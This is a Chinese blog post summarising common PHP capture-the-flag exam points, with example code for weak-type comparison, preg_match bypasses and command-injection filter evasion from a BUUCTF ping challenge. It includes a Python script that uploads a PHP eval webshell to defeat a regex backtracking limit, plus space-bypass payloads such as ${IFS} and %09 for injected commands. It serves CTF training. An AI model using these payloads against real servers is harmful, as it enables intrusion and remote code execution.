CTF-PHP常见考点实例小结

最新推荐文章于 2024-05-24 23:30:00 发布
最新推荐文章于 2024-05-24 23:30:00 发布
阅读量402 收藏 4
点赞数
文章标签: linux kali linux mysql
原文链接:https://blog.csdn.net/qq_53577336
版权

CTF-PHP常见考点实例小结

0x00 CTF-PHP常见考点

1.php弱类型的比较

2.php断言问题

3.php读取文件问题

4.updatexml(),__wakeup ,preg_match等函数考点

5.sha1()函数与md5()知识点

6.异或注入绕过考点

7.源文件泄露

8.extract变量覆盖

9.strcmp漏洞…

10.RCE的命令执行绕过考点

总结的不是很全面,一些常见的考点,希望师傅们多多指点
看到网上不少师傅的总结,感觉不错值得学习。

下面取几个考点类型案例分析帮助理解,实际加强php类型考点多在靶场修炼才更深刻。

0x01 案例1:弱类型绕过案例

php存在=,==,===三种比较符号

第一个=相当于直接赋值的道理

第二个= = 会直接将对象转换为相同类在进行比较

第三个= = = 会判断两种类型对象是否相等,再作比较

<?php
var_dump("admin"==0); //true   0=0 为真
var_dump("1admin"==1); //true   1=1 为正
var_dump("admin1"==1); //false 0 不等于 1 返回假
var_dump("admin1"===1); //类型不等 为假
var_dump("admin"===1);   //类型不等 为假
var_dump("0e123456"=="0e4456789"); //true   所有0e默认类为取值0 0=0 为真
var_dump("0e123456"==="0e4456789"); //类型相等数值不等 为假
?>


一段简短的代码审计题目帮助理解php弱类型

$num=$_GET['num'];
if(!is_numeric($num))   // is_numeric () 函数用于检测变量是否为数字或数字字符串。
{
    echo $num;
    if($num==1)   //num=1xxx 即可构成   1=1 返回为真取值flag
          echo 'flag{**********}';
}

payload:num=1abc 构成比较为1=1 为真输出flag

0x02 preg_match函数绕过

首先了解preg_match函数作用:用于执行一个正则表达式匹配。赛题中用来过滤函数

<?php
//模式分隔符后的"i"标记这是一个大小写不敏感的搜索
if (preg_match("/php/i", "PHP is the web scripting language of choice.")) {
  echo "查找到匹配的字符串 php。";
} else {
  echo "未发现匹配的字符串 php。";
}
?>

在这里插入图片描述

常见preg_match的绕过的三种方式:

(1)数组绕过,当传递参数为数组,会返回true

payload:传参:?a=[]=flag.php

(2)最大PCRE(正则查找匹配次数)突破,中文的回溯次数在100万次就会崩溃,构造exp突破次数即可返回truepauload:

import requests
from io import BytesIO

files = {
'file': BytesIO(b'aaa<?php eval($_POST[txt]);//' + b'a' * 1000000)
}

res = requests.post('http://x.x.x.x:xx/index.php', files=files, allow_redirects=False)
print(res.headers)

(3)".“换行符绕过,”."不会匹配换行符payload:

if (preg_match('/^.*(flag).*$/', $json)) {
  echo 'Hacking attempt detected<br/><br/>';
}
//$json="\nflag"

if (preg_match('/^flag$/', $_GET['a']) && $_GET['a'] !== 'flag') {
  echo $flag;
}
//?a=flag%0a

参考了网上师傅总结,值得学习记录一下

0x03 案例2:RCE绕过案例

学习地址:BUUCTF(题目地址:ping ping ping)
在这里插入图片描述
题目页面:
在这里插入图片描述
发现flag地址:
在这里插入图片描述
空格被过滤:
在这里插入图片描述
绕过rce执行空格:php-rce绕过参考:https://zhuanlan.zhihu.com/p/391439312
在这里插入图片描述
符号被过滤
在这里插入图片描述
尝试绕过被过滤字符串flag:
在这里插入图片描述

空格绕过参考:
%09(url传递)(cat%09flag.php)
${IFS}
$IFS$9
<>(cat<>/flag)
<(cat</flag)
{cat,flag}

总结:题目难度偏小 ,$IFS$2绕过空格加上拼接flag字符串,以;字符分割执行rce,获取flag。

RCE命令执行绕过总结网上很多,可以多加学习:命令执行(RCE)面对各种过滤,骚姿势绕过总结等
总结的文章对于爱好ctf的小白比较友好,希望有师傅们路过指点!

个人web学习笔记:CSDN用户名:告白热
https://blog.csdn.net/qq_53577336

转载自鹏组安全公众号内的内容

艾欧罗斯
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF常见PHP函数漏洞
渗透、攻防、CTF、编程
07-04 2520
1.弱类型比较 2.MD5 compare漏洞 PHP在处理哈希字符串时,如果利用”!=”或”==”来对哈希值进行比较,它把每一个以”0x”开头的哈希值都解释为科学计数法0的多少次方(为0),所以如果两个不同的密码经过哈希以后,其哈希值都是以”0e”开头的,那么php将会认为他们相同。 常见的payload有 0x01 md5(str) QNKCDZO 240610708 s878926199a s155964671a s214587387a...
CTF 隐写术经典例题讲解
10-22
该内容为CTF赛题隐写术经理例题讲解,包含图片隐写,流量分析,文件查看,文件分离,加密解密等多种题型讲解,图文结合,适合新手学习。
ctf常见php rce绕过总结
2302_76827504的博客
04-28 2054
只是总结一些常见的姿势,大佬轻喷。
[CTF_网络安全] 攻防世界 php_rce 解题详析
最新发布
Z4400840的博客
05-24 1101
PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),攻击者通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。下面简单介绍一种常见的远程 RCE 漏洞利用方式,即利用 PHP 中的eval函数实现 RCE 的方式。
ctf web方向与php学习记录20之RCE初见
这周末在做梦的博客
10-16 458
一,RCE是什么? 1定义:RCE(remote command/code execute)远程代码执行,是互联网的一种安全漏洞。 2分类 (1)远程命令执行ping (2)远程代码执行evel。 3漏洞出现的原因 没有在输入口做输入处理。 注意:由于传入的必须是有效的 PHP 代码,所有的语句必须以分号结尾。 二,ctfhub——eval执行 先执行 url+/?cmd=passthru(“ls”);或 url+/?cmd=system(“ls”);后无有效信息。 然后输入 url+/?cmd=passt
php黑魔法【CTFphp总结
热门推荐
大方子
08-24 1万+
前言 php的很多特性再带来编程方面的同时也会带来很多安全隐患,其中一些漏洞在CTF中经常出现,本文大部分示例也是取自CTF题目。这里首先说一下==和===区别。==是比较运算,它不会去检查条件式的表达式的类型,===是恒等,它会检查查表达式的值与类型是否相等,NULL,0,”0″,array()使用==和false比较时,都是会返回true的,而使用===却不会。 注:本文部分内容及代码并非原...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-all-in-one
01-30
ctf-all-in-one
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
在这个"CTF-Web-Challenge"中,你将有机会学习和实践如何在Web环境中识别和利用漏洞。 PHP是一种广泛使用的服务器端脚本语言,特别适合开发动态网站。在CTF挑战中,你可能会遇到的PHP相关知识点包括: 1. **PHP...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
CTF-Tools-v1.3.7.zip
01-29
CTF常用工具集
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出题人申请重新对过渡进行修改发布的权利,但对每个题均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 对已提供Dockerfile...
ctf-wscan-master.zip
12-08
"ctf-wscan-master.zip" 是一个用于CTF(Capture The Flag)竞赛的工具集合,特别设计在Linux环境下运行。CTF是一种网络安全竞赛,参与者通过解密、逆向工程、漏洞挖掘等方式攻防对抗,争夺虚拟"旗帜",即获取特定的...
CTF-RSA-tool-master.zip
01-19
针对CTF中CRYPTO的RSA工具
CTF中常用的php原生类总结
记录学习,一起进步
06-12 2891
CTF中常用的php原生类总结
CTFPHP 弱类型&异或取反&序列化&RCE
qi_SJQ_的博客
03-01 958
PHP考点很多,思维导图只能包括大部分的考点,未必全,网上相关总结文章也很多,比如: CTF php总结(一)、CTF php总结(二)、CTF php总结(三)总结了比较常见的基础php题型。 虽然ctf web题原来以php为主,后来加入了python,现在又比较流行java,总体来说php仍然还是比较重要的。 随便几个知识选讲(而且很多知识也是综合考察): 1.php强弱类型比较: “==”是弱类型比较,只比较数值;“= = =”是强类型比较,会比较数值以及变量类型。最简单的是字符串与数字比较,不过.
Buuctf web真题1(php伪协议&Rce过滤绕过&md5()小bug&http)
weixin_63231007的博客
04-05 2086
[ACTF2020 新生赛]Include 考察利用php://filter伪协议进行文件包含 首先尝试php://input伪协议: 发现被过滤。 然后尝试使用php://filter伪协议来继续包含, 构造playloads:php://filter/read=convert.base64-encode/resource=flag.php 得到base码。 将其进行解码,得到flag。 ......
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值